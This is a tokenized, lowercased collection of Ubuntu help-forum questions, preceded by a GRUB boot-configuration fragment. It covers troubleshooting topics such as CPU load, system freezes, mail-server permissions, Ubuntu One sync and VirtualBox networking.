# # if [ $ { recordfail } ! = 1 ] ; then if [ -e $ { prefix } /gfxblacklist.txt ] ; then if hwmatch $ { prefix } /gfxblacklist.txt 3 ; then if [ $ { match } = 0 ] ; then set linux_gfx_mode=keep else set linux_gfx_mode=text fi else set linux_gfx_mode=text fi else set linux_gfx_mode=keep fi else set linux_gfx_mode=text fi export linux_gfx_mode if [ `` $ linux_gfx_mode '' ! = `` text '' ] ; then load_video ; fi menuentry 'ubuntu , with linux 2.6.38-8-generic ' -- class ubuntu -- class gnu-linux -- class gnu -- class os { recordfail set gfxpayload= $ linux_gfx_mode insmod part_msdos insmod ext2 set root= ' ( hd0 , msdos1 ) ' search -- no-floppy -- fs-uuid -- set=root 44f311b4-0b40-4d10-b004-78108539fc39 linux /boot/vmlinuz-2.6.38-8-generic root=uuid=44f311b4-0b40-4d10-b004-78108539fc39 ro quiet splash vt.handoff=7 initrd /boot/initrd.img-2.6.38-8-generic } menuentry 'ubuntu , with linux 2.6.38-8-generic ( recovery mode ) ' -- class ubuntu -- class gnu-linux -- class gnu -- class os { recordfail set gfxpayload= $ linux_gfx_mode insmod part_msdos insmod ext2 set root= ' ( hd0 , msdos1 ) ' search -- no-floppy -- fs-uuid -- set=root 44f311b4-0b40-4d10-b004-78108539fc39 echo 'loading linux 2.6.38-8-generic ... ' linux /boot/vmlinuz-2.6.38-8-generic root=uuid=44f311b4-0b40-4d10-b004-78108539fc39 ro single echo 'loading initial ramdisk ... ' initrd /boot/initrd.img-2.6.38-8-generic } # # # end /etc/grub.d/10_linux # # # # # # begin /etc/grub.d/20_linux_xen # # # # # # end /etc/grub.d/20_linux_xen # # # # # # begin /etc/grub.d/20_memtest86+ # # # menuentry `` memory test ( memtest86+ ) '' { insmod part_msdos insmod ext2 set root= ' ( hd0 , msdos1 ) ' search -- no-floppy -- fs-uuid -- set=root 44f311b4-0b40-4d10-b004-78108539fc39 linux16 /boot/memtest86+.bin } menuentry `` memory test ( memtest86+ , serial console 115200 ) '' { insmod part_msdos insmod ext2 set root= ' ( hd0 , msdos1 ) ' search -- no-floppy -- fs-uuid -- set=root 44f311b4-0b40-4d10-b004-78108539fc39 linux16 /boot/memtest86+.bin console=ttys0,115200n8 } # # # end /etc/grub.d/20_memtest86+ # # # # # # begin /etc/grub.d/30_os-prober # # # if [ `` x $ { timeout } '' ! = `` x-1 '' ] ; then if keystatus ; then if keystatus -- shift ; then set timeout=-1 else set timeout=0 fi else if sleep -- interruptible 3 ; then set timeout=0 fi fi fi # # # end /etc/grub.d/30_os-prober # # # # # # begin /etc/grub.d/40_custom # # # # this file provides an easy way to add custom menu entries . simply type the # menu entries you want to add after this comment . be careful not to change # the 'exec tail ' line above . # # # end /etc/grub.d/40_custom # # # # # # begin /etc/grub.d/41_custom # # # if [ -f $ prefix/custom.cfg ] ; then source $ prefix/custom.cfg ; fi # # # end /etc/grub.d/41_custom # # #
118373	lenovo v570 cpu fan running constantly , cpu core 1 running over 90 % !	i have seen that a lot of people are having this same issue . i am running a lenovo v570 i5 4 core , 6 gigs of ram , and am running 11.10 onieric ocelot . on my system monitor graph it shows cpu at 20 % , when i open the monitor it shows core # 1 at around 90 % , the other cores fluctuate at or below 5-12 % if even . now this seems like a really terrible balance of power between the cores , especially with so much stress on one core only , when these things are designed to work with 4 cores and not at such high temps . my current readings say 64 degrees celsius , this does not seem normal for any cpu , and i am seriously considering , working on my windows7 partition until i see a real solution to this issue or upgrading to 12.04 right away when it comes out ... i have seen countless things saying it has something to do with the kernel , the kernel on mine is the same as when i upgraded , i really do not like messing with it , as when i had 11.04 , i did tinker with it due to the freeze issues i was having , and that just made worse issues . i like this version 11.10 and would like to keep it for a while , but without the fear that my core is going to fry ! so any help would be much appreciated ! i did try changing a couple things in acpi , and restarting this did not help , and here i am . i tried one thing prior to that that was listed under a different computer brand , but it would not do a make on the file . i really need help with this , i rely on this computer for a lot of things , and love this os ! please help so i do not need to resort to my microsoft partition ! please ! here is the fwts cpufrequ- output : rabbit @ rabbit-lenovo-v570 : ~ $ sudo fwts cpufreq - 00001 fwts results generated by fwts : version v0.23.25 ( thu oct 6 15 00002 fwts :12:31 bst 2011 ) . 00003 fwts 00004 fwts some of this work - copyright ( c ) 1999 - 2010 , intel corp. 00005 fwts all rights reserved . 00006 fwts some of this work - copyright ( c ) 2010 - 2011 , canonical . 00007 fwts 00008 fwts this test run on 02/04/12 at 17:23:22 on host linux 00009 fwts rabbit-lenovo-v570 3.0.0-17-generic-pae # 30-ubuntu smp thu 00010 fwts mar 8 17:53:35 utc 2012 i686 . 00011 fwts 00012 fwts running tests : cpufreq . 00014 cpufreq cpu frequency scaling tests ( takes ~1-2 mins ) . 00015 cpufreq -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - 00016 cpufreq test 1 of 1 : cpu p-state checks . 00017 cpufreq for each processor in the system , this test steps through 00018 cpufreq the various frequency states ( p-states ) that the bios 00019 cpufreq advertises for the processor . for each processor/frequency 00020 cpufreq combination , a quick performance value is measured . the 00021 cpufreq test then validates that : 00022 cpufreq 1 ) each processor has the same number of frequency states 00023 cpufreq 2 ) higher advertised frequencies have a higher performance 00024 cpufreq 3 ) no duplicate frequency values are reported by the bios 00025 cpufreq 4 ) is bios wrongly doing sw_all p-state coordination across cores 00026 cpufreq 5 ) is bios wrongly doing sw_any p-state coordination across cores 00027 cpufreq frequency | speed 00028 cpufreq -- -- -- -- -- -+ -- -- -- -- - 00029 cpufreq 2.45 ghz | 100.0 % 00030 cpufreq 2.45 ghz | 83.7 % 00031 cpufreq 2.05 ghz | 69.2 % 00032 cpufreq 1.85 ghz | 62.5 % 00033 cpufreq 1.65 ghz | 55.2 % 00034 cpufreq 1400 mhz | 48.6 % 00035 cpufreq 1200 mhz | 41.8 % 00036 cpufreq 1000 mhz | 34.5 % 00037 cpufreq 800 mhz | 27.6 % 00038 cpufreq 9 cpu frequency steps supported 00039 cpufreq frequency | speed 00040 cpufreq -- -- -- -- -- -+ -- -- -- -- - 00041 cpufreq 2.45 ghz | 97.7 % 00042 cpufreq 2.45 ghz | 83.7 % 00043 cpufreq 2.05 ghz | 69.6 % 00044 cpufreq 1.85 ghz | 63.3 % 00045 cpufreq 1.65 ghz | 55.7 % 00046 cpufreq 1400 mhz | 48.7 % 00047 cpufreq 1200 mhz | 41.7 % 00048 cpufreq 1000 mhz | 34.5 % 00049 cpufreq 800 mhz | 27.5 % 00050 cpufreq frequency | speed 00051 cpufreq -- -- -- -- -- -+ -- -- -- -- - 00052 cpufreq 2.45 ghz | 97.7 % 00053 cpufreq 2.45 ghz | 84.4 % 00054 cpufreq 2.05 ghz | 69.6 % 00055 cpufreq 1.85 ghz | 62.6 % 00056 cpufreq 1.65 ghz | 55.9 % 00057 cpufreq 1400 mhz | 48.7 % 00058 cpufreq 1200 mhz | 41.7 % 00059 cpufreq 1000 mhz | 34.7 % 00060 cpufreq 800 mhz | 27.8 % 00061 cpufreq frequency | speed 00062 cpufreq -- -- -- -- -- -+ -- -- -- -- - 00063 cpufreq 2.45 ghz | 100.0 % 00064 cpufreq 2.45 ghz | 82.6 % 00065 cpufreq 2.05 ghz | 67.8 % 00066 cpufreq 1.85 ghz | 61.4 % 00067 cpufreq 1.65 ghz | 54.9 % 00068 cpufreq 1400 mhz | 48.3 % 00069 cpufreq 1200 mhz | 41.1 % 00070 cpufreq 1000 mhz | 34.3 % 00071 cpufreq 800 mhz | 27.4 % 00072 cpufreq frequency | speed 00073 cpufreq -- -- -- -- -- -+ -- -- -- -- - 00074 cpufreq 2.45 ghz | 96.2 % 00075 cpufreq 2.45 ghz | 82.5 % 00076 cpufreq 2.05 ghz | 69.3 % 00077 cpufreq 1.85 ghz | 62.7 % 00078 cpufreq 1.65 ghz | 55.0 % 00079 cpufreq 1400 mhz | 47.4 % 00080 cpufreq 1200 mhz | 41.1 % 00081 cpufreq 1000 mhz | 34.0 % 00082 cpufreq 800 mhz | 27.2 % 00083 cpufreq frequency | speed 00084 cpufreq -- -- -- -- -- -+ -- -- -- -- - 00085 cpufreq 2.45 ghz | 96.5 % 00086 cpufreq 2.45 ghz | 83.6 % 00087 cpufreq 2.05 ghz | 68.1 % 00088 cpufreq 1.85 ghz | 61.7 % 00089 cpufreq 1.65 ghz | 54.9 % 00090 cpufreq 1400 mhz | 48.0 % 00091 cpufreq 1200 mhz | 41.1 % 00092 cpufreq 1000 mhz | 34.2 % 00093 cpufreq 800 mhz | 27.8 % 00094 cpufreq frequency | speed 00095 cpufreq -- -- -- -- -- -+ -- -- -- -- - 00096 cpufreq 2.45 ghz | 96.4 % 00097 cpufreq 2.45 ghz | 82.6 % 00098 cpufreq 2.05 ghz | 68.8 % 00099 cpufreq 1.85 ghz | 60.5 % 00100 cpufreq 1.65 ghz | 52.4 % 00101 cpufreq 1400 mhz | 48.8 % 00102 cpufreq 1200 mhz | 41.1 % 00103 cpufreq 1000 mhz | 34.2 % 00104 cpufreq 800 mhz | 26.4 % 00105 cpufreq frequency | speed 00106 cpufreq -- -- -- -- -- -+ -- -- -- -- - 00107 cpufreq 2.45 ghz | 95.3 % 00108 cpufreq 2.45 ghz | 82.5 % 00109 cpufreq 2.05 ghz | 65.5 % 00110 cpufreq 1.85 ghz | 62.8 % 00111 cpufreq 1.65 ghz | 54.8 % 00112 cpufreq 1400 mhz | 48.0 % 00113 cpufreq 1200 mhz | 41.2 % 00114 cpufreq 1000 mhz | 34.2 % 00115 cpufreq 800 mhz | 27.3 % 00116 cpufreq frequency | speed 00117 cpufreq -- -- -- -- -- -+ -- -- -- -- - 00118 cpufreq 2.45 ghz | 96.3 % 00119 cpufreq 2.45 ghz | 83.4 % 00120 cpufreq 2.05 ghz | 68.3 % 00121 cpufreq 1.85 ghz | 61.9 % 00122 cpufreq 1.65 ghz | 54.9 % 00123 cpufreq 1400 mhz | 48.0 % 00124 cpufreq 1200 mhz | 41.1 % 00125 cpufreq 1000 mhz | 34.2 % 00126 cpufreq 800 mhz | 27.3 % 00127 cpufreq frequency | speed 00128 cpufreq -- -- -- -- -- -+ -- -- -- -- - 00129 cpufreq 2.45 ghz | 100.0 % 00130 cpufreq 2.45 ghz | 77.9 % 00131 cpufreq 2.05 ghz | 64.6 % 00132 cpufreq 1.85 ghz | 54.0 % 00133 cpufreq 1.65 ghz | 51.7 % 00134 cpufreq 1400 mhz | 45.2 % 00135 cpufreq 1200 mhz | 39.0 % 00136 cpufreq 1000 mhz | 33.1 % 00137 cpufreq 800 mhz | 25.5 % 00138 cpufreq frequency | speed 00139 cpufreq -- -- -- -- -- -+ -- -- -- -- - 00140 cpufreq 2.45 ghz | 93.4 % 00141 cpufreq 2.45 ghz | 75.7 % 00142 cpufreq 2.05 ghz | 64.5 % 00143 cpufreq 1.85 ghz | 59.1 % 00144 cpufreq 1.65 ghz | 51.4 % 00145 cpufreq 1400 mhz | 45.9 % 00146 cpufreq 1200 mhz | 39.3 % 00147 cpufreq 1000 mhz | 32.7 % 00148 cpufreq 800 mhz | 25.8 % 00149 cpufreq frequency | speed 00150 cpufreq -- -- -- -- -- -+ -- -- -- -- - 00151 cpufreq 2.45 ghz | 92.1 % 00152 cpufreq 2.45 ghz | 78.1 % 00153 cpufreq 2.05 ghz | 65.7 % 00154 cpufreq 1.85 ghz | 58.6 % 00155 cpufreq 1.65 ghz | 52.5 % 00156 cpufreq 1400 mhz | 45.7 % 00157 cpufreq 1200 mhz | 39.3 % 00158 cpufreq 1000 mhz | 32.7 % 00159 cpufreq 800 mhz | 24.3 % 00160 cpufreq frequency | speed 00161 cpufreq -- -- -- -- -- -+ -- -- -- -- - 00162 cpufreq 2.45 ghz | 88.9 % 00163 cpufreq 2.45 ghz | 79.8 % 00164 cpufreq 2.05 ghz | 58.4 % 00165 cpufreq 1.85 ghz | 52.6 % 00166 cpufreq 1.65 ghz | 46.9 % 00167 cpufreq 1400 mhz | 41.0 % 00168 cpufreq 1200 mhz | 35.1 % 00169 cpufreq 1000 mhz | 29.1 % 00170 cpufreq 800 mhz | 22.9 % 00171 cpufreq frequency | speed 00172 cpufreq -- -- -- -- -- -+ -- -- -- -- - 00173 cpufreq 2.45 ghz | 92.8 % 00174 cpufreq 2.45 ghz | 80.1 % 00175 cpufreq 2.05 ghz | 66.2 % 00176 cpufreq 1.85 ghz | 59.5 % 00177 cpufreq 1.65 ghz | 52.9 % 00178 cpufreq 1400 mhz | 46.2 % 00179 cpufreq 1200 mhz | 39.5 % 00180 cpufreq 1000 mhz | 32.9 % 00181 cpufreq 800 mhz | 26.3 % 00182 cpufreq frequency | speed 00183 cpufreq -- -- -- -- -- -+ -- -- -- -- - 00184 cpufreq 2.45 ghz | 92.9 % 00185 cpufreq 2.45 ghz | 79.5 % 00186 cpufreq 2.05 ghz | 66.2 % 00187 cpufreq 1.85 ghz | 59.6 % 00188 cpufreq 1.65 ghz | 52.9 % 00189 cpufreq 1400 mhz | 46.7 % 00190 cpufreq 1200 mhz | 39.6 % 00191 cpufreq 1000 mhz | 32.9 % 00192 cpufreq 800 mhz | 26.3 % 00193 cpufreq failed [ medium ] cpufreqcpussettosw_any : test 1 , processors 00194 cpufreq are set to sw_any . 00195 cpufreq failed [ medium ] cpufreqsw_any : test 1 , firmware not 00196 cpufreq implementing hardware coordination cleanly . firmware using 00197 cpufreq sw_any instead ? . 00198 cpufreq 00199 cpufreq ========================================================= 00200 cpufreq 0 passed , 2 failed , 0 warnings , 0 aborted , 0 skipped , 0 00201 cpufreq info only . 00202 cpufreq ========================================================= 00204 summary 00205 summary 0 passed , 2 failed , 0 warnings , 0 aborted , 0 skipped , 0 00206 summary info only . 00207 summary 00208 summary test failure summary 00209 summary ==================== 00210 summary 00211 summary critical failures : none 00212 summary 00213 summary high failures : none 00214 summary 00215 summary medium failures : 2 00216 summary cpufreq test , at 1 log line : 193 00217 summary `` processors are set to sw_any . '' 00218 summary cpufreq test , at 1 log line : 195 00219 summary `` firmware not implementing hardware coordination cleanly . firmware using sw_any instead ? . '' 00220 summary 00221 summary low failures : none 00222 summary 00223 summary other failures : none 00224 summary 00225 summary test |pass |fail |abort|warn |skip |info | 00226 summary -- -- -- -- -- -- -- -+ -- -- -+ -- -- -+ -- -- -+ -- -- -+ -- -- -+ -- -- -+ 00227 summary cpufreq | | 2| | | | | 00228 summary -- -- -- -- -- -- -- -+ -- -- -+ -- -- -+ -- -- -+ -- -- -+ -- -- -+ -- -- -+ 00229 summary total : | 0| 2| 0| 0| 0| 0| 00230 summary -- -- -- -- -- -- -- -+ -- -- -+ -- -- -+ -- -- -+ -- -- -+ -- -- -+ -- -- -+ rabbit @ rabbit-lenovo-v570 : ~ $
118386	thunderbird extension messaganing menu and unity launcher integration stopped working	after i restarted my laptop , the thunderbird extension stopped working and i ca n't seem to get it working again . does anyone know how to fix this problem ?
118387	changing the sound setting from the command line	i frequently switch between two sound settings : one directly connecting an analog headphone to the computer , and another is i connect an audio device to the hdmi audio output on the monitor . i want to switch between them quickly by writing a short script to switch between the two settings . how can i do this ?
118390	libreoffice3.5 applications opening in new icon	whenever i open up a program from libreoffice3.5 , it will open in its own launcher icon . for example , if i click on my docked `` writer '' , it will open it up in another icon . here 's a screenshot : i 've also noticed that these opened icons are very blurry in icon , too ... any one else have this problem or a solution ?
118400	missing space in win95 fat32 partition	i 'm trying to set up an 8gb usb drive a persistent live boot . the tutorial i am using told me to use fdisk and create two partitions . the first partition is supposed to be just large enough to hold the iso image i 'm using , which in this case is 2.9gb . using fdisk i can make a partition , but no matter how large i make it ( even filling the entire drive with the one partition ) , nautilus says i only have 2.6gb of free space , which is not enough for the iso . i think the first time i tried this earlier today , i used fdisk and made the partition too small ( 2.5gb ) . i have formatted the usb drive multiple times since ( and restarted my computer ) , but i can not get the drive size to change . any suggestions ?
118406	ubuntu 11.04 64bits keeps randomly freezing	this has been a real headache for me since the number of freezes has increase from twice a week to about 1 or twice a day . the system just halts and nothing can be done but hitting the restart button . at the beginning i thought it was related to flash since i was getting random freezes when playing full screen flash videos online . i also thought it could be the wireless pci card . but the system has freezed using browsing around gnome . the truth is , the freezes are really random and strange . i checked this thread ubuntu keeps randomly freezing and try to ssh my computer using another one , but i could not ssh since it was really totally frozen . numlock or capslock was n't responding or blinking . since i could not ssh i , also ignored this article https : //wiki.ubuntu.com/x/troubleshooting/freeze according to my wife , the system has also halted under win7 pro 64bit but with less frequency . here is my system configuration intel core i7 2600k asrock z68 extreme3 gen3 motherboard crucial m4 128gb ct128m4ssd2 ssd wd caviar green wd10eads 1tb sata ii g.skill ripjaws x series 8gb ( 2 x 4gb ) ddr2 ocz modxstream 600w power supply rosewill rnx-n300x pci wireless adapter no external graphics card i remove the wireless card and used ethernet to see if the problem was the that , but i got a freeze after doing that . i also ran memtest86 and everything was ok . the only other thing i might suspect of is the ssd . i will try to clone the ssd to a hdd to see if that solve the problem . at this point i am stuck with the freezes . do anyone have a clue of why this is happening and how can i solve this ? edit : i clone my ssd to a hdd and my system has n't freeze since then on ubuntu or win7 , though it is significantly slower than before , as expected , specially in windows . what could possible be wrong with my ssd ? : : : crucial m4 128gb ct128m4ssd2 ssd
118408	why does nova need a public interface ?	i 've read some explanations about nova-network and how to configure it like this one from wiki : http : //wiki.openstack.org/understandingflatnetworking i 'm confusing about a detail . if every traffic from the instances must go through nova controller node , then why we still need the public interface for nova-compute node ? is it necessary ? what happen when a request from outside to an instance . for example i have a controller node and a nova-compute node . in nova-compute node i run an instance with a wordpress website . then someone connect to the public ip of this instance . so the request go directly from router to the nova-compute node or from router to controller node then nova-compute node ?
118409	ubuntu 12.04 acer display not proper 16:9	i try to install ubuntu 12.04 lts edition on acer latptop 4752g with core i5 and geforce 610m 1 gb video driver . but when i try for additional hard ware , no nvdia driver is loaded there . what could be the issue . i am not getting 16:9 resolution . could you please help regards
118411	wubi - super block error	we had installed ubuntu 10.04 using wubi on my machine . after a reboot it stopped working . its says super block corrupted is there any tool or how can i get my data from the ubuntu os which is already installed on my mahcine please help me to solve this issue .
118416	dovecot ca n't compact mail folder /var/mail/username	ubuntu 11.10 32bit . setup a dovecot imap server . using thunderbird on a different ubuntu machine ( 64bit ) to access imap server . everything else is fine , except i can not compact the deleted email in inbox , which is stored at /var/mail/username . checking mail.log and i see this error message : apr 3 00:10:11 autumn dovecot : imap ( username ) : error : file_dotlock_create ( /var/mail/username ) failed : permission denied ( euid=1000 ( username ) egid=1000 ( username ) missing +w perm : /var/mail , euid is not dir owner ) ( set mail_privileged_group=mail ) what is wrong with the permission ? here are the permissions for the relevant files : $ ls -ld /var/mail drwxrwsr-x 2 mail mail 4096 2012-04-02 23:36 /var/mail $ ls -l /var/mail/username -rw -- -- -- - 1 username mail 417 2012-04-02 23:36 /var/mail/username anyone knows what 's going on here ?
118421	help with migrating from widows , x64 fglrx , cpu load , java and minecraft	i 'm new to ubuntu , it is the second time i have installed it . this comp is dell studio 1558 . some specs : cpu- intel core i7 q720 1 . 6ghz , gpu- ati mobility radeon hd 5400 fglrx- i 've fallowed these instructions among inspecting many others , i have tried all of the variants mentioned in that tread before reverting back to the drivers supplied with ubuntu ( through additional drivers ) which apparently seem to work best . i am testing them with minecraft as silly as it may sound . in 2 to 60 minutes the fps drop from 70+ to somewhere between 0 and 5 . while `` fgl_glxgears '' runs at between 400 and 800 fps smoothly . i am using oracle ( sun ) jre6 to run minecraft , i have gotten it through a tutorial linked on oracle 's website , i currently have no other version of java installed ( was worse when i had a few others here ) . after closing the game ubuntu is similarly slow , i 've checked the cpu load using system monitor and it shows one of the cpu 's jumping to 80 % ~100 % load at a time . a reboot solves it . i realize my mess is up to me to solve but a hand is always appreciated .
118430	how do i get my paired bluetooth device to work properly and show up in sound settings as a profile ?	i recently paired a brand new jabra halo v2 ( supports : hfa , hsp , a2dp ) and although the device pairs with ubuntu 12.04 ( same issue in 11.10 ) just fine it does n't show up as a audio device profile under sound settings .
118432	logging in with google account credentials ?	i 's it possible to login with google account credentials like in chromeos from gdm ? if so , how ?
118437	launching lightning from command line ?	is there a command that allows me to launch thunderbird 's lightning from command line ? i want to add a command to the thunderbird launcher that allows me to open to a lightning page .
118438	kernel upgrade failed ?	yesterday i tried to upgrade from kernel 3.0.17 to 3.0.18 . after reboot , instead of log in screen i landed on a black screen called busybox it said something like /bin/bash not found , initrams . i have ubuntu 11.10 ( kernel version 3.0.17 ) . any help to understand what i did wrong or what the bug is .
118441	ubuntu 10.04 eats more than 500mb of memory	after installation system monitor shows that memory usage is over 500 mb - pure system after start . there are no processes which use more 20 mb of memory . other versions of ubuntu used about 200 mb . i 'm using 64bit version . intel i7 , 16 gb of memory . what 's going on ? what process are eating my memory ?
118443	after ubuntu one music purchase , sync seems to be incomplete	i 'm having a bit of an issue . i 'm running the 12.04 beta , and i purchased a couple of albums from the ubuntu one music store ( running rhythmbox ) . eight songs on each album downloaded and were synced , but there are a total of eight more songs that have n't downloaded . in rhythmbox , on the download page in the ubuntu one music store , each song just says that it is queued , but i ca n't get them to download . when viewing the ubuntu one music folder in nautilus , the folders all have green checkmarks indicating that the sync is complete , when it clearly is n't . i 've looked around a little bit , looking for some solutions , and found a suggestion to look at u1sdtool in a terminal and see what it was doing , and i got the following result : u1sdtool -- status state : queue_manager connection : with user with network description : processing the commands pool is_connected : true is_error : false is_online : true queues : idle my first thought is to try and get that to not say `` idle . '' i 've stopped and restarted u1sdtool , and my computer , with no success . any assistance would be greatly appreciated .
118448	nautilus , synaptic and system settings crash after kernel version 3.0.0-18-generic installed	on both my laptops i am getting regular crashes of nautilus , synaptic and system settings after an upgrade to kernel 3.0.0-18-generic . as usual , i deleted 3.0.0.17 to save space on my drive -- that was pretty dumb . any ideas on why this might be ? i guess each application might share similar code . edit : dmesg gives this after synaptic crashed : [ 4894.155206 ] synaptic [ 3944 ] general protection ip:102dbd7 sp : bfa2bdec error:0 in libc-2.13.so [ fce000+178000 ] is libc-2.13.so module in the new kernel the problem ? another crash : dmesg reports [ 4894.155206 ] synaptic [ 3944 ] general protection ip:102dbd7 sp : bfa2bdec error:0 in libc-2.13.so [ fce000+178000 ] [ 5366.421289 ] synaptic [ 3979 ] general protection ip : ff9bd7 sp : bf9b00dc error:0 in libc-2.13.so [ f9a000+178000 ] [ 6994.829449 ] synaptic [ 4687 ] general protection ip:1c0bbd7 sp : bfbbde9c error:0 in libc-2.13.so [ 1bac000+178000 ]
118453	missing php.ini after apt-get install php5	i just installed php5 as root via apt-get install php5 , and for whatever reason i ca n't find my php.ini file . running locate php.ini or ls /etc/ | grep php.ini both yield no results . is there anything i 'm missing here ?
118459	no sound and flash videos play super fast after daily update	i just updated my 11.10 ubuntu from the regular auto updater . after i restarted my laptop i have no sound and the videos in youtube ( and other websites ) play super fast . not sure if it has something to do with the case , but since last night i get hd0 out of disk error before the grub screen and on the login screen i have some delay before i can type my password . in the console i see errors like these : status : { drdy err } . i could say the errors have something to do with the sound problem and the flash player , but if this happened when i got the hd0 error , not now after the regular daily update . here is the update history log from /var/log/apt/history.log start-date : 2012-04-03 10:04:39 commandline : aptdaemon role='role-commit-packages ' sender=':1.71' upgrade : python-aptdaemon.gtkwidgets : amd64 ( 0.43+bzr697-0ubuntu1 , 0.43+bzr697-0ubuntu1.2 ) , libvlc5 : amd64 ( 2.0.1+git20120329+r134-0~r35~oneiric1 , 2.0.1+git20120402+r146-0~r36~oneiric1 ) , python-aptdaemon : amd64 ( 0.43+bzr697-0ubuntu1 , 0.43+bzr697-0ubuntu1.2 ) , vlc-nox : amd64 ( 2.0.1+git20120329+r134-0~r35~oneiric1 , 2.0.1+git20120402+r146-0~r36~oneiric1 ) , vlc-plugin-notify : amd64 ( 2.0.1+git20120329+r134-0~r35~oneiric1 , 2.0.1+git20120402+r146-0~r36~oneiric1 ) , aptdaemon : amd64 ( 0.43+bzr697-0ubuntu1 , 0.43+bzr697-0ubuntu1.2 ) , python-aptdaemon-gtk : amd64 ( 0.43+bzr697-0ubuntu1 , 0.43+bzr697-0ubuntu1.2 ) , vlc : amd64 ( 2.0.1+git20120329+r134-0~r35~oneiric1 , 2.0.1+git20120402+r146-0~r36~oneiric1 ) , aptdaemon-data : amd64 ( 0.43+bzr697-0ubuntu1 , 0.43+bzr697-0ubuntu1.2 ) , vlc-data : amd64 ( 2.0.1+git20120329+r134-0~r35~oneiric1 , 2.0.1+git20120402+r146-0~r36~oneiric1 ) , python-aptdaemon.gtk3widgets : amd64 , 0.43+bzr697-0ubuntu1,0.43+bzr697-0ubuntu1.2 ) , libvlccore5 : amd64 ( 2.0.1+git20120329+r134-0~r35~oneiric1 , 2.0.1+git20120402+r146-0~r36~oneiric1 ) , vlc-plugin-pulse : amd64 ( 2.0.1+git20120329+r134-0~r35~oneiric1 , 2.0.1+git20120402+r146-0~r36~oneiric1 ) end-date : 2012-04-03 10:05:15
118471	how to set up automatic mounting of network share	i need to automatically mount a network share to a mount point whenever i log into my computer . currenlty i am doing this manually by running through my history to run the command again and again . sudo mount ipaddress : /path/todir path/to/local/mount/point how can this be done ?
118472	how do i launch a gui application as root on user login ?	i would like to launch a gnome application with root privileges at login . i have tried adding a script to launch using update-rc.d myscript.sh defaults . it looks like the application does launch , but it is no longer there by the time the gnome gui arrives . how can i do that ?
118478	how can i install the latest version of libmtp ?	in the latest version of the libmtp library there are fixes for my android device so i would like to install the latest version i 'm just not sure how ! i would assume that this would pushed into the official repositories at some point , so the smart advice would probably be just to wait , but i would like to know how to do this myself if anyone could tell me . i 'm currently using ubuntu 12.04 and am running libmtp-1.1.2 , the latest version ( libmtp-1.1.3 ) has recently been released and the tar.gz file is downloadable from this direct link : http : //downloads.sourceforge.net/project/libmtp/libmtp/1.1.3/libmtp-1.1.3.tar.gz how do i install this ? thanks for any help .
118484	how to save many pages configuration of a terminal ?	when i open the terminal , it can open four pages , such as src , cmakelist.txt , rosmake fuctions . how to save all pages directory when i need it , i can load all pages in new terminal ?
118486	how to modify the colors of ubuntu panel ?	the background of the menu of ubuntu panel is white . how can i revert to it to black ? here 's a screenshot of the same :
118490	how to i enable nfs caching for mounts made in /etc/auto.master	my /etc/auto.master is looking like this : /usr/groups yp : auto.groups -- timeout=3600 /home yp : auto.home -- timeout=3600 /nistest yp : auto.misc -- timeout=3600 /misc yp : auto.misc -- timeout=3600 i want to enable caching for at least one of these ( /home ) . how ? note : i am aware about the solution for /etc/fstab ( cachefilesd ) from http : //askubuntu.com/a/4578/1004 , but the syntax used by auto.master seems different .
118493	how to install gnome 3 in ubuntu 12.04	do you need to add a ppa , if you want to run latest gnome 3 version in ubuntu 12.04 ? and how to install it ?
118495	python service using upstart on ubuntu	i want to create to deploy a heartbeat service ( a python script ) as a service using upstart . my understanding is that i 've to add a /etc/init/myheartbeatservice.conf with the following contents . # my heartbeat service description `` heartbeat monitor '' start on startup stop on shutdown script exec /path/to/my/python/script.py end script my script starts another service process and the monitors the processes and sends heartbeat to an outside server regularly . are startup and shutdown the correct events ? also my script create a new thread . i 'm assuming i also need to add fork daemon to my conf file ? thanks .
118500	node-xmpp-bosh error on ubuntu 11.10	i am newbie in linux word . i want to implement a bosh server . because it is hard on windows platform i decided to deploy it on a ubuntu virtual machine via vmware . i made installation without problems . i followed the processes on this page . now i want to test my bosh server with the command sudo bosh or sudo /etc/init.d/bosh start , after typing those i get on the terminal starting bosh server after , nothing . i looked on the bosh.err file and i see exec : 2 : /usr/local/lib/bosh/run-server.js : permission denied i doně t know why this error with sudo . when i try ls -l /usr/local/lib/bosh/run-server.js it show -rw-r -- r -- 1 root root 4889 2012-04-01 18:50 /usr/local/lib/bosh/run-server.js how can i make bosh start ?
118502	there is only 728mb free space in my ubuntu one folder ?	i signed up for ubuntu one , it says that i will get 5gb free storage space , but on my pc the ubuntu one folder is only 728mb . what is happening here ?
118503	how to synchronise files with ubuntu one ?	how can i upload or synchronize files to ubuntu one from this pc ?
118504	need database selection advise	i know this is considered a bad question since there is no correct answer , but i need to decide on a database for embedded linux ( davinci 368 based ) hardware and i 've never had to produce a design with a database before . each record will probably contain less than 1000 images with associated alpha-numeric data and the mass storage will be some kind of flash drive . only one user needs access to the data at a time . mysql claims to be `` the world 's most popular open source database '' but sqlite claims to be `` the most widely deployed sql database engine in the world . '' perhaps there is another that is also the best in the world ? which is easiest to use for a database newbie ? should i just flip a coin ? does it really matter which one i pick ? do i even need to use a database software package or should i roll my own ? i wo n't need bells and whistles like sorting , but i 'll probably need to delete the oldest records to make room for new ones if the storage fills up .
118506	virtualbox host-only networking fails on ubuntu 11.10 host	i 've installed ubuntu 11.10 on a new lenovo thinkpad 420s and i 'm trying to get some virtualbox vms up and running ( using vagrant ) . everything works fine until i try to add host-only networking . this is the failure i get in the terminal : i set logging to debug and tried again . here 's a paste of the relevant portion of the log . when i try to add host-only networks with the virtualbox gui ( file- > preferences- > networking- > add host-only networking ) , i get the following error message : this error is occurring with three different virtual boxes , all ubuntu 11.10 64bit guests , one of which i 've run without issue on a windows host and an osx host . here is the vagrantfile for the box i 've successfully run on windows and osx : vagrant : :config.run do |config| config.vm.box = `` ubuntu-11.10 '' config.vm.box_url = `` http : //timhuegdon.com/vagrant-boxes/ubuntu-11.10.box '' config.vm.network : hostonly , `` 192.168.33.10 '' config.vm.customize [ `` modifyvm '' , : id , `` -- memory '' , `` 512 '' ] config.vm.customize [ `` modifyvm '' , : id , `` -- natnet1 '' , `` 10.0.28.0/24 '' ] config.vm.forward_port 80 , 4567 end i 've tried two other boxes as well , one of which i built last night with veewee , all of which are getting the exact same error . i 've used rvm to install ruby 1.9.3-p125 [ x86_64 ] , and i 've got vagrant running in its own gemset . i 've googled quite a lot and have n't been able to find any resolution . suggestions ?
